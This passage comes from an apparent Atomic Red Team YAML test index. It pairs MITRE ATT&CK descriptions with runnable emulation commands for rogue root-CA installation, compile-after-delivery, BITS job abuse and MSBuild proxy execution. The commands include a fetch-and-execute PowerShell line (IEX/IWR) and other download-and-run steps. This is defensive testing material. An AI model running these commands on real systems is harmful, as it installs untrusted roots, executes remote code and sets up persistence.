openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
cp #{cert_filename} /etc/pki/ca-trust/source/anchors/
update-ca-trust
cleanup_command: |
rm /etc/pki/ca-trust/source/anchors/#{cert_filename}
update-ca-trust
name: sh
elevation_required: true
- name: Install root CA on FreeBSD
auto_generated_guid: f4568003-1438-44ab-a234-b3252ea7e7a3
description: 'Creates a root CA with openssl
'
supported_platforms:
- linux
input_arguments:
cert_filename:
description: Path of the CA certificate we create
type: path
default: rootCA.crt
key_filename:
description: Key we create that is used to create the CA certificate
type: path
default: rootCA.key
executor:
command: |
openssl genrsa -out #{key_filename} 4096
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
cp #{cert_filename} /usr/local/share/certs/
certctl rehash
cleanup_command: |
rm /usr/local/share/certs/#{cert_filename}
certctl rehash
name: sh
elevation_required: true
- name: Install root CA on Debian/Ubuntu
auto_generated_guid: 53bcf8a0-1549-4b85-b919-010c56d724ff
description: 'Creates a root CA with openssl
'
supported_platforms:
- linux
input_arguments:
cert_filename:
description: CA file name
type: path
default: rootCA.crt
key_filename:
description: Key we create that is used to create the CA certificate
type: path
default: rootCA.key
dependency_executor_name: sh
dependencies:
- description: 'Verify the certificate exists. It generates if not on disk.
'
prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;
'
get_prereq_command: |
if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
executor:
command: |
mv #{cert_filename} /usr/local/share/ca-certificates
sudo update-ca-certificates
name: sh
elevation_required: true
- name: Install root CA on macOS
auto_generated_guid: cc4a0b8c-426f-40ff-9426-4e10e5bf4c49
description: 'Creates a root CA with openssl
'
supported_platforms:
- macos
input_arguments:
cert_filename:
description: CA file name
type: path
default: rootCA.crt
key_filename:
description: Key we create that is used to create the CA certificate
type: path
default: rootCA.key
dependency_executor_name: sh
dependencies:
- description: 'Verify the certificate exists. It generates if not on disk.
'
prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;
'
get_prereq_command: |
if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
executor:
command: 'sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain"
"#{cert_filename}"
'
name: sh
elevation_required: true
- name: Install root CA on Windows
auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1
description: 'Creates a root CA with Powershell
'
supported_platforms:
- windows
input_arguments:
pfx_path:
description: Path of the certificate
type: path
default: rootCA.cer
dependency_executor_name: powershell
dependencies:
- description: 'Verify the certificate exists. It generates if not on disk.
'
prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 }
'
get_prereq_command: |
$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path}
Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item
executor:
command: |
$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My
Move-Item -Path $cert.PSPath -Destination "Cert:\LocalMachine\Root"
cleanup_command: |
try {
$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My -ErrorAction Ignore
Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
}
catch { }
name: powershell
elevation_required: true
- name: Install root CA on Windows with certutil
auto_generated_guid: 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f
description: 'Creates a root CA with certutil
'
supported_platforms:
- windows
input_arguments:
pfx_path:
description: Path of the certificate
type: path
default: "$env:Temp\\rootCA2.cer"
dependency_executor_name: powershell
dependencies:
- description: 'Certificate must exist at specified location (#{pfx_path})
'
prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 }
'
get_prereq_command: |
$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path}
Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item
executor:
command: 'certutil -addstore my #{pfx_path}
'
cleanup_command: |
try {
$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My
Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
} catch { }
name: powershell
elevation_required: true
- name: Add Root Certificate to CurrentUser Certificate Store
auto_generated_guid: ca20a3f1-42b5-4e21-ad3f-1049199ec2e0
description: |
The following Atomic test simulates adding a generic non-malicious certificate to the CurrentUser certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog.
Keys will look like - \SystemCertificates\CA\Certificates or \SystemCertificates\Root\Certificates
Reference: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
supported_platforms:
- windows
executor:
command: "IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1'
-UseBasicParsing) \n"
cleanup_command: "Get-ChildItem -Path Cert:\\ -Recurse | Where-Object { $_.Thumbprint
-eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item \n"
name: powershell
elevation_required: true
T1027.004:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
created: '2020-03-16T15:30:57.711Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1027/004
external_id: T1027.004
- source_name: ClearSky MuddyWater Nov 2018
description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
campaign. Retrieved November 29, 2018.'
url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
- source_name: ATTACK IQ
description: 'Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske.
(2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land
Binaries. Retrieved July 15, 2024.'
url: https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/
- source_name: TrendMicro WindowsAppMac
description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
Info Stealer and Adware. Retrieved April 25, 2019.
url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:22.358Z'
name: 'Obfuscated Files or Information: Compile After Delivery'
description: |-
Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Praetorian
- Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
- Liran Ravich, CardinalOps
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.2'
identifier: T1027.004
atomic_tests:
- name: Compile After Delivery using csc.exe
auto_generated_guid: ffcdbd6a-b0e8-487d-927a-09127fe9a206
description: |
Compile C# code using csc.exe binary used by .NET
Upon execution an exe named T1027.004.exe will be placed in the temp folder
supported_platforms:
- windows
input_arguments:
output_file:
description: Output compiled binary
type: path
default: C:\Windows\Temp\T1027.004.exe
input_file:
description: C# code that launches calc.exe from a hidden cmd.exe Window
type: path
default: PathToAtomicsFolder\T1027.004\src\calc.cs
dependency_executor_name: powershell
dependencies:
- description: 'C# file must exist on disk at specified location (#{input_file})
'
prereq_command: 'if (Test-Path "#{input_file}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{input_file}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/calc.cs" -OutFile "#{input_file}"
executor:
command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file}
"#{input_file}"
'
cleanup_command: 'del #{output_file} >nul 2>&1
'
name: command_prompt
- name: Dynamic C# Compile
auto_generated_guid: 453614d8-3ba6-4147-acc0-7ec4b3e1faef
description: "When C# is compiled dynamically, a .cmdline file will be created
as a part of the process. \nCertain processes are not typically observed compiling
C# code, but can do so without touching disk. This can be used to unpack a
payload for execution.\nThe exe file that will be executed is named as T1027.004_DynamicCompile.exe
is contained in the 'bin' folder of this atomic, and the source code to the
file is in the 'src' folder.\nUpon execution, the exe will print 'T1027.004
Dynamic Compile'.\n"
supported_platforms:
- windows
input_arguments:
input_file:
description: exe program containing dynamically compiled C# code
type: path
default: PathToAtomicsFolder\T1027.004\bin\T1027.004_DynamicCompile.exe
dependency_executor_name: powershell
dependencies:
- description: 'exe file must exist on disk at specified location (#{input_file})
'
prereq_command: 'if (Test-Path "#{input_file}") {exit 0} else {exit 1}
'
get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/bin/T1027.004_DynamicCompile.exe
-OutFile "#{input_file}"
'
executor:
command: 'Invoke-Expression "#{input_file}"
'
name: powershell
- name: C compile
auto_generated_guid: d0377aa6-850a-42b2-95f0-de558d80be57
description: 'Compile a c file with either gcc or clang on FreeBSD, Linux or
Macos.
'
supported_platforms:
- linux
- macos
input_arguments:
input_file:
description: source file
type: path
default: PathToAtomicsFolder/T1027.004/src/T1027-004-test.c
dependency_executor_name: sh
dependencies:
- description: 'the source file must exist on disk at specified location (#{input_file})
'
prereq_command: 'if [ -e #{input_file} ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'wget https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c
-O "#{input_file}"
'
executor:
command: |
gcc #{input_file} && ./a.out
clang #{input_file} && ./a.out
name: sh
- name: CC compile
auto_generated_guid: da97bb11-d6d0-4fc1-b445-e443d1346efe
description: 'Compile a c file with either gcc or clang on FreeBSD, Linux or
Macos.
'
supported_platforms:
- linux
- macos
input_arguments:
input_file:
description: source file
type: path
default: PathToAtomicsFolder/T1027.004/src/T1027-004-test.cc
dependency_executor_name: sh
dependencies:
- description: 'the source file must exist on disk at specified location (#{input_file})
'
prereq_command: 'if [ -e #{input_file} ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'wget https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.cc
-O #{input_file}
'
executor:
command: |
g++ #{input_file} && ./a.out
clang++ #{input_file} && ./a.out
name: sh
- name: Go compile
auto_generated_guid: 78bd3fa7-773c-449e-a978-dc1f1500bc52
description: 'Compile a go file with golang on FreeBSD, Linux or Macos.
'
supported_platforms:
- linux
- macos
input_arguments:
input_file:
description: source file
type: path
default: PathToAtomicsFolder/T1027.004/src/T1027-004-test.go
dependency_executor_name: sh
dependencies:
- description: 'the source file must exist on disk at specified location (#{input_file})
'
prereq_command: 'if [ -e #{input_file} ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'wget https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.go
-O #{input_file}
'
executor:
command: 'go run #{input_file}
'
name: sh
T1564.007:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b
created: '2020-09-17T12:51:40.845Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1564/007
external_id: T1564.007
- source_name: FireEye VBA stomp Feb 2020
description: 'Cole, R., Moore, A., Stark, G., Stancill, B. (2020, February
5). STOMP 2 DIS: Brilliance in the (Visual) Basics. Retrieved September
17, 2020.'
url: https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html
- source_name: Evil Clippy May 2019
description: 'Hegt, S. (2019, May 5). Evil Clippy: MS Office maldoc assistant.
Retrieved September 17, 2020.'
url: https://outflank.nl/blog/2019/05/05/evil-clippy-ms-office-maldoc-assistant/
- source_name: Microsoft _VBA_PROJECT Stream
description: 'Microsoft. (2020, February 19). 2.3.4.1 _VBA_PROJECT Stream:
Version Dependent Project Information. Retrieved September 18, 2020.'
url: https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-ovba/ef7087ac-3974-4452-aab2-7dba2214d239
- source_name: Walmart Roberts Oct 2018
description: Sayre, K., Ogden, H., Roberts, C. (2018, October 10). VBA Stomping
— Advanced Maldoc Techniques. Retrieved September 17, 2020.
url: https://medium.com/walmartglobaltech/vba-stomping-advanced-maldoc-techniques-612c484ab278
- source_name: pcodedmp Bontchev
description: Bontchev, V. (2019, July 30). pcodedmp.py - A VBA p-code disassembler.
Retrieved September 17, 2020.
url: https://github.com/bontchev/pcodedmp
- source_name: oletools toolkit
description: decalage2. (2019, December 3). python-oletools. Retrieved September
18, 2020.
url: https://github.com/decalage2/oletools
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:22.623Z'
name: VBA Stomping
description: |-
Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
MS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a PerformanceCache that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the _VBA_PROJECT stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream)
An adversary may hide malicious VBA code by overwriting the VBA source code location with zero’s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the _VBA_PROJECT stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.(Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Rick Cole, Mandiant
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- Windows
- macOS
x_mitre_version: '1.2'
atomic_tests: []
T1197:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--c8e87b83-edbb-48d4-9295-4974897525b7
created: '2018-04-18T17:59:24.739Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1197
external_id: T1197
- source_name: CTU BITS Malware June 2016
description: Counter Threat Unit Research Team. (2016, June 6). Malware Lingers
with BITS. Retrieved January 12, 2018.
url: https://www.secureworks.com/blog/malware-lingers-with-bits
- source_name: Symantec BITS May 2007
description: Florio, E. (2007, May 9). Malware Update with Windows Update.
Retrieved January 12, 2018.
url: https://www.symantec.com/connect/blogs/malware-update-windows-update
- source_name: Elastic - Hunting for Persistence Part 1
description: 'French, D., Murphy, B. (2020, March 24). Adversary tradecraft
101: Hunting for persistence using Elastic Security (Part 1). Retrieved
December 21, 2020.'
url: https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1
- source_name: PaloAlto UBoatRAT Nov 2017
description: Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia.
Retrieved January 12, 2018.
url: https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/
- source_name: Microsoft Issues with BITS July 2011
description: Microsoft. (2011, July 19). Issues with BITS. Retrieved January
12, 2018.
url: https://technet.microsoft.com/library/dd939934.aspx
- source_name: Microsoft BITS
description: Microsoft. (n.d.). Background Intelligent Transfer Service. Retrieved
January 12, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/bb968799.aspx
- source_name: Microsoft BITSAdmin
description: Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018.
url: https://msdn.microsoft.com/library/aa362813.aspx
- source_name: Microsoft COM
description: Microsoft. (n.d.). Component Object Model (COM). Retrieved November
22, 2017.
url: https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx
- source_name: Mondok Windows PiggyBack BITS May 2007
description: Mondok, M. (2007, May 11). Malware piggybacks on Windows’ Background
Intelligent Transfer Service. Retrieved January 12, 2018.
url: https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:22.711Z'
name: BITS Jobs
description: |-
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)
Adversaries may abuse BITS to download (e.g. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)), execute, and even clean up after running malicious code (e.g. [Indicator Removal](https://attack.mitre.org/techniques/T1070)). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016)
BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Brent Murphy, Elastic
- David French, Elastic
- Ricardo Dias
- Red Canary
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.5'
identifier: T1197
atomic_tests:
- name: Bitsadmin Download (cmd)
auto_generated_guid: 3c73d728-75fb-4180-a12f-6712864d7421
description: |
This test simulates an adversary leveraging bitsadmin.exe to download
and execute a payload
supported_platforms:
- windows
input_arguments:
remote_file:
description: Remote file to download
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
local_file:
description: Local file path to save downloaded file
type: path
default: "%temp%\\bitsadmin1_flag.ps1"
executor:
command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file}
#{local_file}
'
cleanup_command: 'del #{local_file} >nul 2>&1
'
name: command_prompt
- name: Bitsadmin Download (PowerShell)
auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc
description: |
This test simulates an adversary leveraging bitsadmin.exe to download
and execute a payload leveraging PowerShell
Upon execution you will find a github markdown file downloaded to the Temp directory
supported_platforms:
- windows
input_arguments:
remote_file:
description: Remote file to download
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
local_file:
description: Local file path to save downloaded file
type: path
default: "$env:TEMP\\bitsadmin2_flag.ps1"
executor:
command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination
#{local_file}
'
cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore
'
name: powershell
- name: Persist, Download, & Execute
auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae
description: |
This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transferand execute a payload in multiple steps.
Note that in this test, the file executed is not the one downloaded. The downloading of a random file is simply the trigger for getting bitsdamin to run an executable.
This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of "svchost.exe" and an Initiating Process Command Line of "svchost.exe -k netsvcs -p -s BITS"
This job will remain in the BITS queue until complete or for up to 90 days by default if not removed.
supported_platforms:
- windows
input_arguments:
command_path:
description: Path of command to execute
type: path
default: C:\Windows\system32\notepad.exe
bits_job_name:
description: Name of BITS job
type: string
default: AtomicBITS
local_file:
description: Local file path to save downloaded file
type: path
default: "%temp%\\bitsadmin3_flag.ps1"
remote_file:
description: Remote file to download
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
executor:
command: |
bitsadmin.exe /create #{bits_job_name}
bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} NULL
bitsadmin.exe /resume #{bits_job_name}
ping -n 5 127.0.0.1 >nul 2>&1
bitsadmin.exe /complete #{bits_job_name}
cleanup_command: 'del #{local_file} >nul 2>&1
'
name: command_prompt
- name: Bits download using desktopimgdownldr.exe (cmd)
auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114
description: "This test simulates using desktopimgdownldr.exe to download a
malicious file\ninstead of a desktop or lockscreen background img. The process
that actually makes \nthe TCP connection and creates the file on the disk
is a svchost process (“-k netsvc -p -s BITS”) \nand not desktopimgdownldr.exe.
See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/\n"
supported_platforms:
- windows
input_arguments:
remote_file:
description: Remote file to download
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
download_path:
description: Local file path to save downloaded file
type: path
default: SYSTEMROOT=C:\Windows\Temp
cleanup_path:
description: path to delete file as part of cleanup_command
type: path
default: C:\Windows\Temp\Personalization\LockScreenImage
cleanup_file:
description: file to remove as part of cleanup_command
type: string
default: "*.md"
executor:
command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file}
/eventName:desktopimgdownldr
'
cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >nul 2>&1
'
name: command_prompt
T1127.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--c92e3d68-2349-49e4-a341-7edca2deff96
created: '2020-03-27T21:50:26.042Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1127/001
external_id: T1127.001
- source_name: LOLBAS Msbuild
description: LOLBAS. (n.d.). Msbuild.exe. Retrieved July 31, 2019.
url: https://lolbas-project.github.io/lolbas/Binaries/Msbuild/
- source_name: Microsoft MSBuild Inline Tasks 2017
description: Microsoft. (2017, September 21). MSBuild inline tasks. Retrieved
March 5, 2021.
url: https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-inline-tasks?view=vs-2019#code-element
- source_name: MSDN MSBuild
description: Microsoft. (n.d.). MSBuild1. Retrieved November 30, 2016.
url: https://msdn.microsoft.com/library/dd393574.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:22.881Z'
name: 'Trusted Developer Utilities Proxy Execution: MSBuild'
description: |-
Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)
Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.(Citation: MSDN MSBuild)(Citation: Microsoft MSBuild Inline Tasks 2017) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- "@ionstorm"
- Carrie Roberts, @OrOneEqualsOne
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.4'
identifier: T1127.001
atomic_tests:
- name: MSBuild Bypass Using Inline Tasks (C#)
auto_generated_guid: 58742c0f-cb01-44cd-a60b-fb26e8871c93
description: 'Executes the code in a project file using msbuild.exe. The default
C# project example file (T1127.001.csproj) will simply print "Hello From a
Code Fragment" and "Hello From a Class." to the screen.
'
supported_platforms:
- windows
input_arguments:
filename:
description: Location of the project file
type: path
default: PathToAtomicsFolder\T1127.001\src\T1127.001.csproj
msbuildpath:
description: Default location of MSBuild
type: path
default: C:\Windows\Microsoft.NET\Framework\v4.0.30319
msbuildname:
description: Default name of MSBuild
type: path
default: msbuild.exe
dependency_executor_name: powershell
dependencies:
- description: 'Project file must exist on disk at specified location (#{filename})
'
prereq_command: 'if (Test-Path "#{filename}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{filename}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/T1127.001.csproj" -OutFile "#{filename}"
executor:
command: '#{msbuildpath}\#{msbuildname} "#{filename}"
'
name: command_prompt
- name: MSBuild Bypass Using Inline Tasks (VB)
auto_generated_guid: ab042179-c0c5-402f-9bc8-42741f5ce359
description: 'Executes the code in a project file using msbuild.exe. The default
Visual Basic example file (vb.xml) will simply print "Hello from a Visual
Basic inline task!" to the screen.
'
supported_platforms:
- windows
input_arguments:
filename:
description: Location of the project file
type: path
default: PathToAtomicsFolder\T1127.001\src\vb.xml
msbuildpath:
description: Default location of MSBuild
type: path
default: C:\Windows\Microsoft.NET\Framework\v4.0.30319
msbuildname:
description: Default name of MSBuild
type: path
default: msbuild.exe
dependency_executor_name: powershell
dependencies:
- description: 'Project file must exist on disk at specified location (#{filename})
'
prereq_command: 'if (Test-Path "#{filename}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{filename}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/vb.xml" -OutFile "#{filename}"
executor:
command: '#{msbuildpath}\#{msbuildname} "#{filename}"
'
name: command_prompt
T1656:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--c9e0c59e-162e-40a4-b8b1-78fab4329ada
created: '2023-08-08T15:42:18.906Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1656
external_id: T1656
- source_name: CrowdStrike-BEC
description: Bart Lenaerts-Bergmans. (2023, March 10). What is Business Email
Compromise?. Retrieved August 8, 2023.
url: https://www.crowdstrike.com/cybersecurity-101/business-email-compromise-bec/
- source_name: VEC
description: CloudFlare. (n.d.). What is vendor email compromise (VEC)?. Retrieved
September 12, 2023.
